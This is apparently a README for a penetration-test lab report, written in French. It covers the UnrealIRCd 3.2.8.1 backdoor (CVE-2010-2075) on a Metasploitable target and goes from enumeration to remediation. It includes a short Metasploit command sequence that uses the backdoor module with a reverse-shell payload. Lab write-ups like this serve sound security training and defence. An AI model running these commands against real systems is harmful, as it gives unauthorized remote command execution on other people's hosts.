
Rapport de laboratoire de test d'intrusion contrôlé pour la backdoor UnrealIRCd 3.2.8.1 (CVE-2010-2075) sur Metasploitable3 avec étapes de remédiation.
Un projet de test d'intrusion contrôlé visant à identifier, exploiter et corriger la backdoor UnrealIRCd 3.2.8.1 (CVE-2010-2075) dans un environnement d'entraînement isolé.
Avertissement : Ce projet a été mené strictement à des fins éducatives et de test de sécurité autorisé contre un environnement de laboratoire volontairement vulnérable. Aucun système non autorisé n'a été ciblé.
Ce projet démontre un flux de travail complet d'évaluation de vulnérabilités et d'exploitation contre un service UnrealIRCd 3.2.8.1 vulnérable.
L'évaluation couvre :
| Élément | Détails |
|---|
| Cible | Environnement de laboratoire Metasploitable |
| IP cible | 10.10.10.13 |
| Service vulnérable | UnrealIRCd |
| Version | 3.2.8.1 |
| Protocole | IRC |
| Port | 6667/TCP |
| Vulnérabilité | Backdoor UnrealIRCd |
| CVE | CVE-2010-2075 |
| Sévérité | Critique |
Selon la National Vulnerability Database du NIST, les distributions UnrealIRCd 3.2.8.1 concernées contenaient une modification introduite de l'extérieur qui pouvait permettre à des attaquants distants d'exécuter des commandes arbitraires.
Les principaux objectifs de cette évaluation étaient :
| Outil | Objectif |
|---|---|
| Nmap | Scan de ports et énumération de services |
| Netcat | Test de connectivité des services TCP |
| Metasploit Framework | Exploitation contrôlée |
| Linux CLI | Vérification et durcissement du système |
| UFW | Configuration du pare-feu |
| Python | Tâches de sécurité/test de support |
L'évaluation a suivi un flux de travail de test d'intrusion simplifié :
Reconnaissance
↓
Service Enumeration
↓
Vulnerability Identification
↓
Exploitation
↓
Evidence Collection
↓
Impact Assessment
↓
Remediation
↓
Verification
La première étape consistait à identifier les services exposés sur l'hôte cible.
L'évaluation a identifié un service IRC à l'écoute sur :
TCP/6667
Le service a été associé à UnrealIRCd 3.2.8.1, une version connue pour être affectée par la vulnérabilité de la backdoor.

Figure 1 — Énumération des ports et des services
La découverte du TCP/6667 a fourni l'indication initiale qu'un service IRC était exposé et nécessitait une enquête plus approfondie.
La version UnrealIRCd identifiée a été associée à CVE-2010-2075.
La vulnérabilité n'est pas simplement un bug logiciel conventionnel. L'archive concernée contenait une modification/backdoor malveillante qui permettait l'exécution de commandes à distance. La NVD décrit le problème comme un cheval de Troie introduit de l'extérieur dans la macro DEBUG3_DOLOG_SYSTEM.
La documentation Metasploit de Rapid7 identifie le module correspondant comme suit :
exploit/unix/irc/unreal_ircd_3281_backdoor
et le décrit comme exploitant la backdoor malveillante présente dans les archives UnrealIRCd 3.2.8.1 concernées.
La vulnérabilité a été validée dans l'environnement de laboratoire isolé à l'aide du Metasploit Framework.
Exemple de flux de travail d'exploitation :
msfconsole
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOSTS 10.10.10.13
set PAYLOAD cmd/unix/reverse
run
Le but de cette étape était de vérifier si le service exposé pouvait être abusé pour obtenir une exécution de commandes à distance.
Rapid7 documente ce module Metasploit spécifiquement pour la backdoor UnrealIRCd 3.2.8.1.

Figure 2 — Preuve de l'exploitation contrôlée
La preuve démontre l'étape d'exploitation réalisée contre la cible de laboratoire autorisée.
L'exploitation réussie de la backdoor peut offrir à un attaquant la capacité d'exécuter des commandes à distance dans le contexte de sécurité du processus UnrealIRCd concerné.
Les privilèges exacts obtenus dépendent du compte sous lequel le démon IRC s'exécute.
L'impact potentiel comprend :
Important : L'impact potentiel ne doit pas être interprété comme une preuve que chaque action listée a été réalisée au cours de cette évaluation.
La documentation de Nmap pour la backdoor UnrealIRCd confirme que la vulnérabilité peut être utilisée pour exécuter des commandes arbitraires sur le système distant.
L'installation UnrealIRCd vulnérable ne doit pas rester exposée dans un environnement de production.
Les actions de remédiation recommandées comprennent :
Si IRC n'est pas requis :
sudo ufw deny 6667/tcp
Si le service est requis, l'accès doit être restreint aux réseaux de confiance plutôt que d'être largement exposé.
L'approche privilégiée consiste à supprimer le logiciel vulnérable et à déployer une version prise en charge et fiable, plutôt que de tenter de s'appuyer uniquement sur le filtrage réseau.
L'étape de remédiation a été documentée après l'application des contrôles de sécurité appropriés.

Figure 3 — Preuve de remédiation / durcissement
La preuve de remédiation doit démontrer l'état du service et/ou de la configuration du pare-feu après l'application des actions correctives.
| Catégorie | Évaluation |
|---|---|
| Vulnérabilité | Backdoor UnrealIRCd 3.2.8.1 |
| CVE | CVE-2010-2075 |
| Vecteur d'attaque | Réseau |
| Authentification requise | Aucune authentification requise pour déclencher la backdoor |
| Interaction utilisateur | Non requise |
| Impact | Exécution de commandes à distance |
| Sévérité | Critique |
La backdoor a été conçue pour permettre l'exécution de commandes à distance et pouvait fonctionner indépendamment des restrictions normales des utilisateurs IRC, faisant de l'exposition du service vulnérable un risque de sécurité significatif.
unrealircd-backdoor-pentest-report/
│
├── README.md
├── UnrealIRCD_Backdoor_PenTest_Report.pdf
│
└── images/
├── port_scan.png
├── exploit_evidence.png
└── remediation.png
| Preuve | Description |
|---|---|
port_scan.png | Découverte du service IRC exposé |
exploit_evidence.png | Preuve de l'exploitation contrôlée |
remediation.png | Preuve de sécurité/durcissement post-remédiation |
Cette évaluation démontre plusieurs concepts importants de test d'intrusion :
NIST National Vulnerability Database — CVE-2010-2075
Détails du CVE et description de la vulnérabilité.
Rapid7 Vulnerability Database — Exécution de commandes via la backdoor UnrealIRCd 3.2.8.1
Documentation du module Metasploit et détails techniques.
Rapid7 Metasploit Framework — Module backdoor UnrealIRCd
Implémentation officielle du module Metasploit.
Documentation Nmap NSE — irc-unrealircd-backdoor
Documentation pour la détection de la backdoor UnrealIRCd.
Ce dépôt est destiné uniquement à l'éducation en cybersécurité, aux tests d'intrusion autorisés et à la recherche en sécurité dans des environnements contrôlés.
Les techniques démontrées dans ce projet ne doivent être utilisées que contre des systèmes pour lesquels une autorisation explicite a été obtenue.
N'utilisez pas ces techniques contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester.